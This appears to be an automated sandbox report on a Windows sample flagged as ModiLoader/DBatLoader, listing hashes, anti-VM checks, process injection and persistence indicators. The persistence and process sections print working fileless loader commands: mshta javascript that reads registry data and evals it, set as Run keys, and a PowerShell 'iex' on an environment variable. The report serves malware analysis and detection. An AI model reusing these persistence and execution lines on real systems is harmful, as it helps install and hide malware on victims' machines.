Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21-09-2024 16:39
Static task
static1
Behavioral task
behavioral1
Sample
f035acc028258683beaf855d15749dd0_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
f035acc028258683beaf855d15749dd0_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
f035acc028258683beaf855d15749dd0_JaffaCakes118.exe
-
Size
297KB
-
MD5
f035acc028258683beaf855d15749dd0
-
SHA1
f3ed6d3276409e64c2c8667a9a7a56b07d1efb48
-
SHA256
f8d58e2fa1af08b76b8295f87428fb77126fb504c8b2269fc9cdb9899348aeb5
-
SHA512
c0831859b3f363ae3784e10ec8202ae7d94bedfa778dfe8eca900f707149c17ec4c789e1a848b05b3b86acbe174b2bb6af49437e16d148bec70bb35ac909c63a
-
SSDEEP
6144:xTx9Z4h3oSNcDW1m7Y3qPr5Qh0auUMnbBD96:TIr+aiVJagBDo
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2480 1888 mshta.exe 31 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
description ioc Process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 58 IoCs
resource yara_rule behavioral1/memory/2092-5-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2092-6-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2092-7-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2092-8-0x0000000001DF0000-0x0000000001EC6000-memory.dmp modiloader_stage2 behavioral1/memory/2092-10-0x0000000001DF0000-0x0000000001EC6000-memory.dmp modiloader_stage2 behavioral1/memory/2092-12-0x0000000001DF0000-0x0000000001EC6000-memory.dmp modiloader_stage2 behavioral1/memory/2092-11-0x0000000001DF0000-0x0000000001EC6000-memory.dmp modiloader_stage2 behavioral1/memory/2092-9-0x0000000001DF0000-0x0000000001EC6000-memory.dmp modiloader_stage2 behavioral1/memory/2092-13-0x0000000001DF0000-0x0000000001EC6000-memory.dmp modiloader_stage2 behavioral1/memory/2092-14-0x0000000001DF0000-0x0000000001EC6000-memory.dmp modiloader_stage2 behavioral1/memory/2820-24-0x0000000006190000-0x0000000006266000-memory.dmp modiloader_stage2 behavioral1/memory/676-25-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-28-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-35-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-42-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-51-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-57-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-56-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-68-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-50-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-49-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-48-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-47-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-46-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-45-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-44-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-43-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-41-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-40-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-39-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-38-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-37-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-36-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-34-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-67-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-61-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-60-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-59-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-32-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-30-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-29-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-33-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/676-31-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/2820-27-0x0000000006190000-0x0000000006266000-memory.dmp modiloader_stage2 behavioral1/memory/3016-87-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-86-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-85-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-84-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-83-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-82-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-81-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-80-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-79-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-78-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-77-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-76-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-75-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 behavioral1/memory/3016-74-0x00000000001B0000-0x00000000002F1000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
pid Process 676 regsvr32.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\810b6.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\814fa\\1933a.lnk\"" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:C1UYJeix=\"avV4Gqe\";KX4=new%20ActiveXObject(\"WScript.Shell\");d5TST8Tsa=\"IBJKZXhB\";V4hm0V=KX4.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\yifrufkkyi\\\\fcecg\");xNVL5g=\"Smuwez\";eval(V4hm0V);LgGfsQ4=\"wTd3\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:Fm4mQedk2=\"bnB4z\";dF7=new%20ActiveXObject(\"WScript.Shell\");qJGr0QGh7=\"Vt\";qW2Qo=dF7.RegRead(\"HKCU\\\\software\\\\yifrufkkyi\\\\fcecg\");JdaL93A=\"Kt\";eval(qW2Qo);F1Szfg=\"Mi9Jq\";" regsvr32.exe -
pid Process 2820 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2820 set thread context of 676 2820 powershell.exe 36 PID 676 set thread context of 3016 676 regsvr32.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f035acc028258683beaf855d15749dd0_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f035acc028258683beaf855d15749dd0_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\5afc8\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\5afc8\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\5afc8\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:Lwbkx9H=\"ppyKWFF\";a56o=new ActiveXObject(\"WScript.Shell\");jt1FbaX3I=\"XQQ\";Tiy56e=a56o.RegRead(\"HKCU\\\\software\\\\yifrufkkyi\\\\fcecg\");Ytnj6mRA=\"EyCp46l\";eval(Tiy56e);sQO7Sb=\"7JicP\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\.997542 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\.997542\ = "5afc8" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\5afc8 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\5afc8\shell regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 2820 powershell.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe 676 regsvr32.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 2820 powershell.exe 676 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2820 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2536 wrote to memory of 2092 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 30 PID 2536 wrote to memory of 2092 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 30 PID 2536 wrote to memory of 2092 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 30 PID 2536 wrote to memory of 2092 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 30 PID 2536 wrote to memory of 2092 2536 f035acc028258683beaf855d15749dd0_JaffaCakes118.exe 30 PID 2480 wrote to memory of 2820 2480 mshta.exe 33 PID 2480 wrote to memory of 2820 2480 mshta.exe 33 PID 2480 wrote to memory of 2820 2480 mshta.exe 33 PID 2480 wrote to memory of 2820 2480 mshta.exe 33 PID 2820 wrote to memory of 676 2820 powershell.exe 36 PID 2820 wrote to memory of 676 2820 powershell.exe 36 PID 2820 wrote to memory of 676 2820 powershell.exe 36 PID 2820 wrote to memory of 676 2820 powershell.exe 36 PID 2820 wrote to memory of 676 2820 powershell.exe 36 PID 2820 wrote to memory of 676 2820 powershell.exe 36 PID 2820 wrote to memory of 676 2820 powershell.exe 36 PID 2820 wrote to memory of 676 2820 powershell.exe 36 PID 676 wrote to memory of 3016 676 regsvr32.exe 37 PID 676 wrote to memory of 3016 676 regsvr32.exe 37 PID 676 wrote to memory of 3016 676 regsvr32.exe 37 PID 676 wrote to memory of 3016 676 regsvr32.exe 37 PID 676 wrote to memory of 3016 676 regsvr32.exe 37 PID 676 wrote to memory of 3016 676 regsvr32.exe 37 PID 676 wrote to memory of 3016 676 regsvr32.exe 37 PID 676 wrote to memory of 3016 676 regsvr32.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\f035acc028258683beaf855d15749dd0_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f035acc028258683beaf855d15749dd0_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Users\Admin\AppData\Local\Temp\f035acc028258683beaf855d15749dd0_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f035acc028258683beaf855d15749dd0_JaffaCakes118.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2092
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:ZNrw0TO2="iJlg";Kk15=new%20ActiveXObject("WScript.Shell");x4kjXM0="diWi";Kr9ji=Kk15.RegRead("HKLM\\software\\Wow6432Node\\I2Qp1BGTBM\\9UNrd23a");s2Es0l="RhKyYfK5";eval(Kr9ji);ek1py="kQMjSZDk";1⤵
- Process spawned unexpected child process
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:zobzt2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3016
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
869B
MD5d3fad7debed143f4c1d5f96c1a657f38
SHA1d1522ce80ea6f2a8d59cb4dc098f1a911e86f9e5
SHA256732b3bad6b9a46c1204eade98b5a0558afbc0f7546e11fdb983dbc781e69aecc
SHA512a8ac8f4964d72da4d716013530786f1ae8d87659b28fd95f4a2c24e7bd76a5d5d2eed32e64556ac3ced8e376b1a89c28b0b6cba18d9fde9dae4a8798c22467bd
-
Filesize
58B
MD5776f7fa13532d4ca1e7708ec77ef87b0
SHA1c8507d968d89c91422ab346b2aa05d3ebaef8c04
SHA256ca4fd875f06dfe862482bff5bbf18ec04604fa8ac210852336609c60d89d9fa9
SHA51293e5a8866b07d061f46382eb5ae30aec53b8c2a489affb558ea1d43fd7061a0901320123bf06f938956a321c4e9373d81c944693da3f1dc316fe5acaf166659a
-
Filesize
34KB
MD5a24aca98bd9456dad2a1d0124bb4d443
SHA1b7678e16b90e24b6a24753b7cdaccbbe18d1df30
SHA256ea997bab9c000b60b9f8764add78bdc92965ec3d212cb2a390be935fc9a6c608
SHA5127793c45a4e28655013178d299abf293902c9594e25502c1eb6f4307590b84db380aa11470e3a442999b32f8528cd2c2bf9612397c032ca8575b247e85792d690
-
Filesize
1KB
MD527a2360d0a09cb5e2ba6d386e1df3643
SHA1f4b26a43e290b72bb4532e35a278a348b619d412
SHA256b8390bf76cedddfe5b608fe91978d0bb968b7fe7b01c4a447ab96ae642a832b4
SHA5128ff051d1f86acc4d6598950422e955dea1598da1e9e48274ed7e068c3f5f71d8930a46b547f52723052c6cf8ce5815bc47db2adbf473f0a467a37ae075e4ffd9
-
Filesize
985B
MD588e7164a339de2eb70ecadb78c5c9a6c
SHA16e986e177bb8dbdb86822b604269580e88aac1bf
SHA2564a41cbfca03c7b83ec91bee4c50b30b7eb9b133f229e25904b38fbcdfc9ef4aa
SHA512aef58f6a308f20b03d2ff0d02e9dc296c3a235e9545e107658d4076ea32af7748a500a77dd9c2a6c8898f1d9fd9199781ee565639f899ae4ea930c246bc85d11